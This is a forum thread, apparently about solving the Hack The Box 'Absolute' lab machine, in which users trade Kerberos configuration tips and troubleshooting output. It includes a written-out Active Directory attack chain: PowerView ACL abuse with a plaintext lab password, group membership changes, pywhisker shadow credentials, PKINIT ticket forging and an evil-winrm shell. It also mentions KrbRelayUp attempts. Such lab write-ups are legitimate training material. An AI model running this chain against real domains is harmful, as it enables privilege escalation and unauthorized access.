In case people haven't noticed yet, when setting up the domain from linux, ensure the realm is in all UPPER CASE and matches exactly with what the DC asks for. i figured that's why this box is call absolute.

python3 ~/tools/pywhisker/pywhisker.py -d ABSOLUTE.HTB -t m.lovegod -u [email protected] -k --no-pass -a list
 Searching for the target account Target user found: CN=m.lovegod,CN=Users,DC=absolute,DC=htb Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

cat /etc/krb5.conf           
[libdefaults]
        default_realm = ABSOLUTE.HTB

[realms]
        ABSOLUTE.HTB = {
                kdc = DC.ABSOLUTE.HTB
                admin_server = ABSOLUTE.HTB
        }

(September 28, 2022, 03:05 AM)meowmeowattack Wrote: In case people haven't noticed yet, when setting up the domain from linux, ensure the realm is in all UPPER CASE and matches exactly with what the DC asks for. i figured that's why this box is call absolute.

python3 ~/tools/pywhisker/pywhisker.py -d ABSOLUTE.HTB -t m.lovegod -u [email protected] -k --no-pass -a list
 Searching for the target account Target user found: CN=m.lovegod,CN=Users,DC=absolute,DC=htb Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

cat /etc/krb5.conf           
[libdefaults]
        default_realm = ABSOLUTE.HTB

[realms]
        ABSOLUTE.HTB = {
                kdc = DC.ABSOLUTE.HTB
                admin_server = ABSOLUTE.HTB
        }

This is sooooooooooooooooooooo dumb.

Thanks a million. Got Evil-WinRM access. 
Got user.

(September 28, 2022, 03:12 AM)samhub123 Wrote:

(September 28, 2022, 03:05 AM)meowmeowattack Wrote: In case people haven't noticed yet, when setting up the domain from linux, ensure the realm is in all UPPER CASE and matches exactly with what the DC asks for. i figured that's why this box is call absolute.

python3 ~/tools/pywhisker/pywhisker.py -d ABSOLUTE.HTB -t m.lovegod -u [email protected] -k --no-pass -a list
 Searching for the target account Target user found: CN=m.lovegod,CN=Users,DC=absolute,DC=htb Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

cat /etc/krb5.conf           
[libdefaults]
        default_realm = ABSOLUTE.HTB

[realms]
        ABSOLUTE.HTB = {
                kdc = DC.ABSOLUTE.HTB
                admin_server = ABSOLUTE.HTB
        }

This is sooooooooooooooooooooo dumb.

Thanks a million. Got Evil-WinRM access. 
Got user.

np, please share some step summaries if you'd like

Here you go,First on my windows machine I add the user m.lovegod to the "Network Audit" group.[quote]$dc_domain="absolute.htb"$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb -principalidentity "m.lovegod"Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server dc.absolute.htbGet-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred[/quote]The machine resets its AD config very quickly, so as soon as those commands are done from my linux machine I do:[quote]getTGT.py absolute.htb/m.lovegod:export KRB5CCNAME=[/quote][quote]pywhisker.py -d absolute.htb -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add"[/quote]From the above command we get a pfx file and a password associated with it.Then we use the PKINITtools to get a ticket from the pfx file as follows:[quote]gettgtpkinit.py absolute.htb/winrm_user -cert-pfx -pfx-pass winrm_user_ccache[/quote] Then we get the ccache file for winrm_userthen edit the /etc/krb5.conf file to make sure everything is in CAPS. refer to @meowmeowattack post to do thatUse evil-winrm to get a shell[quote]evil-winrm -i DC.ABSOLUTE.HTB -r ABSOLUTE.HTB[/quote]Then read the user flag on desktop.

Two very interesting binaries in the C:/temp folder.

one of them is KrbRelay.exe

[quote="samhub123" pid="541589" dateline="1664335498"]Here you go,First on my windows machine I add the user m.lovegod to the "Network Audit" group.[quote]$dc_domain="absolute.htb"$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb -principalidentity "m.lovegod"Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server dc.absolute.htbGet-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred[/quote]The machine resets its AD config very quickly, so as soon as those commands are done from my linux machine I do:[quote]getTGT.py absolute.htb/m.lovegod:export KRB5CCNAME=[/quote][quote]pywhisker.py -d absolute.htb -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add"[/quote]From the above command we get a pfx file and a password associated with it.Then we use the PKINITtools to get a ticket from the pfx file as follows:[quote]gettgtpkinit.py absolute.htb/winrm_user -cert-pfx -pfx-pass winrm_user_ccache[/quote] Then we get the ccache file for winrm_userthen edit the /etc/krb5.conf file to make sure everything is in CAPS. refer to @meowmeowattack post to do thatUse evil-winrm to get a shell[quote]evil-winrm -i DC.ABSOLUTE.HTB -r ABSOLUTE.HTB[/quote]Then read the user flag on desktop.[/quote]what's wrong ?[code]Exception calling "FindAll" with "0" argument(s): "Unknown error (0x80005000)"At C:\Users\hh\Desktop\PowerView.ps1:6663 char:20+ else { $Results = $ObjectSearcher.FindAll() }+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : DirectoryServicesCOMException Unable to resolve principal: m.lovegodAt C:\Users\hh\Desktop\PowerView.ps1:8529 char:13+ throw "Unable to resolve principal: $PrincipalIdentity"+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : OperationStopped: (Unable to resolve principal: m.lovegod:String) [], RuntimeException + FullyQualifiedErrorId : Unable to resolve principal: m.lovegod [/code]

Tried KRBRelayUp attack but it fails on step 1 with error:

[-] Could not add new computer account:
[-] The server cannot handle directory requests.

gonna take a short break now.

(September 28, 2022, 03:14 AM)Hacker2222 Wrote:

(September 28, 2022, 02:49 AM)samhub123 Wrote:

(September 28, 2022, 02:38 AM)Hacker2222 Wrote:

(September 28, 2022, 02:16 AM)samhub123 Wrote: Okay, I was able to get ccahe file for winrm_user using pywhisker.
From that I also got the NThash for winrm_user

but using CME with hash and also with the ticket, it seems like I cannot access winrm using winrm_user

if u have ccache file then just use evilwinrm?? how ddid u add lovegod to the group tho?

$dc_domain="absolute.htb"

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred

Let me know if you get winrm working.

thanks ................... need to make windows server vm i think ........ commando vm cant run DomainObjectAcl  i guess ..... will catch up  :P

i re-installed a windows server 2019 from scratch and installed the activedirectory module, still getting password incorrect error with the powershell script above, so shouldn't be anything to do with the distribution. there might still be a setup issue.

FYI, i did the following to setup the windows server:
* Install ActiveDirectory module
* Add hosts file entry for absolute.htb
* Change internet time server to absolute.htb
* Chagen network adatpr DNS server to the target DC IP

Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect.
"
At C:\tev\PowerView.ps1:6663 char:20
+             else { $Results = $ObjectSearcher.FindAll() }
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DirectoryServicesCOMException

Unable to resolve principal: m.lovegod
At C:\tev\PowerView.ps1:8529 char:13
+             throw "Unable to resolve principal: $PrincipalIdentity"
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (Unable to resolve principal: m.lovegod:String) [], RuntimeException
    + FullyQualifiedErrorId : Unable to resolve principal: m.lovegod

(September 28, 2022, 07:51 AM)meowmeowattack Wrote:

(September 28, 2022, 03:14 AM)Hacker2222 Wrote:

(September 28, 2022, 02:49 AM)samhub123 Wrote:

(September 28, 2022, 02:38 AM)Hacker2222 Wrote:

(September 28, 2022, 02:16 AM)samhub123 Wrote: Okay, I was able to get ccahe file for winrm_user using pywhisker.
From that I also got the NThash for winrm_user

but using CME with hash and also with the ticket, it seems like I cannot access winrm using winrm_user

if u have ccache file then just use evilwinrm?? how ddid u add lovegod to the group tho?

$dc_domain="absolute.htb"

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred

Let me know if you get winrm working.

thanks ................... need to make windows server vm i think ........ commando vm cant run DomainObjectAcl  i guess ..... will catch up  :P

i re-installed a windows server 2019 from scratch and installed the activedirectory module, still getting password incorrect error with the powershell script above, so shouldn't be anything to do with the distribution. there might still be a setup issue.

FYI, i did the following to setup the windows server:
* Install ActiveDirectory module
* Add hosts file entry for absolute.htb
* Change internet time server to absolute.htb
* Chagen network adatpr DNS server to the target DC IP

Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect.
"
At C:\tev\PowerView.ps1:6663 char:20
+             else { $Results = $ObjectSearcher.FindAll() }
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DirectoryServicesCOMException

Unable to resolve principal: m.lovegod
At C:\tev\PowerView.ps1:8529 char:13
+             throw "Unable to resolve principal: $PrincipalIdentity"
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (Unable to resolve principal: m.lovegod:String) [], RuntimeException
    + FullyQualifiedErrorId : Unable to resolve principal: m.lovegod

what command you got that error on?

(September 28, 2022, 07:56 AM)samhub123 Wrote:

(September 28, 2022, 07:51 AM)meowmeowattack Wrote:

(September 28, 2022, 03:14 AM)Hacker2222 Wrote:

(September 28, 2022, 02:49 AM)samhub123 Wrote:

(September 28, 2022, 02:38 AM)Hacker2222 Wrote: if u have ccache file then just use evilwinrm?? how ddid u add lovegod to the group tho?

$dc_domain="absolute.htb"

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred

Let me know if you get winrm working.

thanks ................... need to make windows server vm i think ........ commando vm cant run DomainObjectAcl  i guess ..... will catch up  :P

i re-installed a windows server 2019 from scratch and installed the activedirectory module, still getting password incorrect error with the powershell script above, so shouldn't be anything to do with the distribution. there might still be a setup issue.

FYI, i did the following to setup the windows server:
* Install ActiveDirectory module
* Add hosts file entry for absolute.htb
* Change internet time server to absolute.htb
* Chagen network adatpr DNS server to the target DC IP

Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect.
"
At C:\tev\PowerView.ps1:6663 char:20
+             else { $Results = $ObjectSearcher.FindAll() }
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DirectoryServicesCOMException

Unable to resolve principal: m.lovegod
At C:\tev\PowerView.ps1:8529 char:13
+             throw "Unable to resolve principal: $PrincipalIdentity"
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (Unable to resolve principal: m.lovegod:String) [], RuntimeException
    + FullyQualifiedErrorId : Unable to resolve principal: m.lovegod

what command you got that error on?

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"